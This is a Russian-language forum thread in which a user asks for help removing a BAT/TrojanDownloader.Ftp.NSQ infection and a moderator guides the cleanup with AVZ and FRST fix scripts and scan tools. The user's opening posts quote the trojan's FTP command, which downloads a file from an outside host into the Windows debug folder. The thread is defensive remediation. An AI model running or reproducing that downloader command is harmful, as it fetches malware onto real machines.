• Внимание. Восстановление баз 1С7, 1C8 и Mssql после атаки шифровальщика, подробности и отзывы читайте в профильной теме.

Решена BAT/TrojanDownloader.Ftp.NSQ что это и как удалить с компьютера

Статус
В этой теме нельзя размещать новые ответы.

Oleksa

Активный пользователь
Сообщения
196
Реакции
31
Баллы
68
Здравствуйте! ESETOnlineScanner_RUS обнаружил- (((BAT/TrojanDownloader.Ftp.NSQ))). При открытии файла такой текст:(open ftp.oo000oo.me test 1433get s.dat c:\windows\debug\item.dat bye). Файл находится в:C:\Windows\System32\P ESETOnlineScanner удаляет его,но безрезультатно. Фай удаляется в ручную,но при перезагрузке компьютера, восстанавливается. Что это и как его удалить? Спасибо!
 

Oleksa

Активный пользователь
Сообщения
196
Реакции
31
Баллы
68
Здравствуйте! ESETOnlineScanner_RUS обнаружил- (((BAT/TrojanDownloader.Ftp.NSQ))). При открытии файла такой текст:(open ftp.oo000oo.me test 1433get s.dat c:\windows\debug\item.dat bye). Файл находится в:C:\Windows\System32\P ESETOnlineScanner удаляет его,но безрезультатно. Фай удаляется в ручную,но при перезагрузке компьютера, восстанавливается. Что это и как его удалить? Спасибо!
 
Последнее редактирование:

Sandor

Команда форума
Супер-Модератор
Ассоциация VN/VIP
Преподаватель
Сообщения
6,862
Реакции
2,105
Баллы
643
Oleksa, здравствуйте!

Чтобы ответить на Ваши вопросы, нам нужны логи по правилам, собранные с помощью Autologger-а.
 

Oleksa

Активный пользователь
Сообщения
196
Реакции
31
Баллы
68
Логи по правилам, собранные с помощью Autologger-а.
 

Вложения

  • CollectionLog-2017.07.14-13.17.zip
    68.6 KB · Просмотры: 3

Sandor

Команда форума
Супер-Модератор
Ассоциация VN/VIP
Преподаватель
Сообщения
6,862
Реакции
2,105
Баллы
643
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

Код:
begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 QuarantineFile('c:\windows\debug\item.dat', '');
 ExecuteFile('schtasks.exe', '/delete /TN "Mysa1" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "Mysa2" /F', 0, 15000, true);
 DeleteFile('c:\windows\debug\item.dat');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
RebootWindows(true);
end.

Компьютер перезагрузится.



Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 8 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.



  • Скачайте AdwCleaner (by Malwarebytes) и сохраните его на Рабочем столе.
  • Запустите его (в ОС Vista/Windows 7, 8, 8.1, 10 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[Sx].txt.
  • Прикрепите отчет к своему следующему сообщению.

Подробнее читайте в этом руководстве.
 

Sandor

Команда форума
Супер-Модератор
Ассоциация VN/VIP
Преподаватель
Сообщения
6,862
Реакции
2,105
Баллы
643
Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочкой также "Shortcut.txt".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

Sandor

Команда форума
Супер-Модератор
Ассоциация VN/VIP
Преподаватель
Сообщения
6,862
Реакции
2,105
Баллы
643
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению
Где отчеты?
 

Oleksa

Активный пользователь
Сообщения
196
Реакции
31
Баллы
68
Как на счет угроз???
Farbar Recovery Scan Tool- угрозы: Antivirus scan for 4dad5793331e5929780ef1dc79eb48f6d393490f347b632daa7e5d53c50e5495 at 2017-07-14 12:02:34 UTC - VirusTotal показал 2 угрозы: 1).Antiy-AVL Trojan/Generic.ASVCS3S.1E5 20170714 и 2).Bkav W32.HfsAtITA.1719 20170714
Как на счет угроз???
 

Вложения

  • Addition.txt
    31.8 KB · Просмотры: 2
  • FRST.txt
    29.8 KB · Просмотры: 1
  • Shortcut.txt
    58.5 KB · Просмотры: 1
Последнее редактирование:

Sandor

Команда форума
Супер-Модератор
Ассоциация VN/VIP
Преподаватель
Сообщения
6,862
Реакции
2,105
Баллы
643
  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код:
    Start::
    CreateRestorePoint:
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
    HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{8b895855-b60f-4017-8301-cd71eb60a96a} <==== ATTENTION (Restriction - IP)
    BHO: No Name -> {D5FEC983-01DB-414a-9456-AF95AC9ED7B5} -> No File
    BHO-x32: No Name -> {D5FEC983-01DB-414a-9456-AF95AC9ED7B5} -> No File
    Toolbar: HKLM - No Name - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} -  No File
    Toolbar: HKU\S-1-5-21-1387383663-2430255384-2943498389-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
    Toolbar: HKU\S-1-5-21-1387383663-2430255384-2943498389-1000 -> No Name - {91397D20-1446-11D4-8AF4-0040CA1127B6} -  No File
    FF Extension: (SuperMegaBest.com) - C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\Extensions\[email protected] [2014-05-05] [not signed]
    ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} =>  -> No File
    ContextMenuHandlers01: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files (x86)\AIMP\System\aimp_menu64.dll -> No File
    ContextMenuHandlers01: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} =>  -> No File
    ContextMenuHandlers04: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => C:\Program Files (x86)\AIMP\System\aimp_menu64.dll -> No File
    ContextMenuHandlers06: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} =>  -> No File
    Task: {B3888384-40A4-49E7-8CAC-185AA82B46B7} - \Mysa -> No File <==== ATTENTION
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.


Два антивируса много:
Avast Free Antivirus
Norton Internet Security
Один удалите, один оставьте - Чистка системы после некорректного удаления антивируса.

Сообщите что сейчас с проблемой.
Как на счет угроз???
Ложное срабатывание.
 

Oleksa

Активный пользователь
Сообщения
196
Реакции
31
Баллы
68
Высылаю Fixlog.txt.
 

Вложения

  • Fixlog.txt
    5.1 KB · Просмотры: 2

Oleksa

Активный пользователь
Сообщения
196
Реакции
31
Баллы
68
Добрый день! Переделал,высылаю лог-файл. Сканировал ещё раз,угроза осталась.Высылаю скрины и текстовый документ.Что дальше?,спасибо!
Поменял аватар,так как,прошлая нервирует меня.
 

Вложения

  • Fixlog.txt
    5.2 KB · Просмотры: 1
  • ESET Online Scanner.jpg
    ESET Online Scanner.jpg
    33.8 KB · Просмотры: 7
  • ESET Online Scanner(1).jpg
    ESET Online Scanner(1).jpg
    24.3 KB · Просмотры: 10
  • ESET Online Scanner(2).jpg
    ESET Online Scanner(2).jpg
    34.3 KB · Просмотры: 9
  • .txt.txt
    180 байт · Просмотры: 1
  • image.gif
    image.gif
    589.7 KB · Просмотры: 9

Oleksa

Активный пользователь
Сообщения
196
Реакции
31
Баллы
68
Проделал ещё несколько раз сканирование ESETOnlineScanner,с перегрузками компа,угроз не обнаружено.Надеюсь,что всё получилось.Пару дней поработаю сканером ESETOnlineScanner,если,что-то обнаружится напишу на форум,а пока,большое спасибо,за проделанную работу,успехов Вам и здоровья Sandor!!!Надеюсь,что мы скоро,закроем эту тему.Ещё раз,СПАСИБО!!!Если будут,какие-то указания или советы,с удовольствием приму,но тему пока не закрываем.С уважением Oleksa!
30996-42ac4e071fcf9e02e513f764fca4a3da.gif
15294.jpg
 

Sandor

Команда форума
Супер-Модератор
Ассоциация VN/VIP
Преподаватель
Сообщения
6,862
Реакции
2,105
Баллы
643
Темы без нарушений не закрываются.

Скачайте Malwarebytes' Anti-Malware. Установите.
На вкладке "Параметры" - "Личный кабинет" ("Settings" - "My Account") нажмите кнопку "Деактивировать ознакомительную Premium-версию".
На вкладке "Проверка" - "Полная проверка" нажмите кнопку "Начать проверку". Дождитесь окончания проверки.
Самостоятельно ничего не удаляйте!!!
Нажмите кнопку "Сохранить результат - Текстовый файл (*.txt)". Имя сохраняемому файлу дайте любое, например, "scan".
Отчёт прикрепите к сообщению.
Подробнее читайте в руководстве.
 

Oleksa

Активный пользователь
Сообщения
196
Реакции
31
Баллы
68
Как запустить по умолчанию,это запустить не от имени администратора,а два щелчка,левой кнопкой? Антивирус отключить?
 
Последнее редактирование:

Sandor

Команда форума
Супер-Модератор
Ассоциация VN/VIP
Преподаватель
Сообщения
6,862
Реакции
2,105
Баллы
643

Oleksa

Активный пользователь
Сообщения
196
Реакции
31
Баллы
68
Добрый день!Сканирование проделал,высылаю отчет.Что дальше?
 

Вложения

  • mbam-log.txt
    47.9 KB · Просмотры: 2

Sandor

Команда форума
Супер-Модератор
Ассоциация VN/VIP
Преподаватель
Сообщения
6,862
Реакции
2,105
Баллы
643
Повторите сканирование в MBAM если уже его закрыли, отметьте галочками все найденное - нажмите "Поместить выделенные объекты в карантин" ("Quarantine Selected") - смотрите, что удаляете.

Подробнее читайте в руководстве.


После удаления ещё раз просканируйте и прикрепите к своему сообщению новый лог.
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху Снизу